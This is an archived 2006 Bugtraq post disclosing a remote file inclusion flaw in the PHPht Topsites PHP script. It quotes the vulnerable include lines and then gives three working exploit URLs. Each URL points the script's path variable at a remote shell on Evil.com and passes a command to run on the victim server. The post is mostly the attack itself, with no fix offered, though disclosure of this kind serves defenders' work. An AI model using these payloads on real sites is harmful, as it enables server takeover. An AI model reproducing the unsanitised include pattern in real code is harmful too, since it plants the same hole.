lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 12 Oct 2006 23:20:56 -0000 From: By_KorsaN_Son@...mail.com To: bugtraq@...urityfocus.com Subject: PHPht Topsites Remote File İnclude # BiyoSecurity.Org & SecurityWall.Org # Scripts: PHPht Topsites Remote File İnclude # Download: http://www.linkini.net/phpscripts/descargas/Top%20Sites%20(8%20Archivos)/PHPht%20Topsites.zip # Greetz : Liz0zim , RMx , TR_IP , DreamLord # Regards : KorsaN # Vulnerable file : All Files :=) #vulnerable code : include($phpht_real_path . 'extension.inc'); include($phpht_real_path . 'common.'.$phpEx); #Exploit : http://www.victim.com/[PATH TO SCRİPT]/index.php?phpht_real_path=http://Evil.com/cmd.gif?&cmd=ls http://www.victim.com/[PATH TO SCRİPT]/[FİLENAME].php?phpht_real_path=http://Evil.com/cmd.gif?&cmd=ls http://www.victim.com/[PATH TO SCRİPT]/admin/[FİLENAME].php?phpht_real_path=http://Evil.com/cmd.gif?&cmd=ls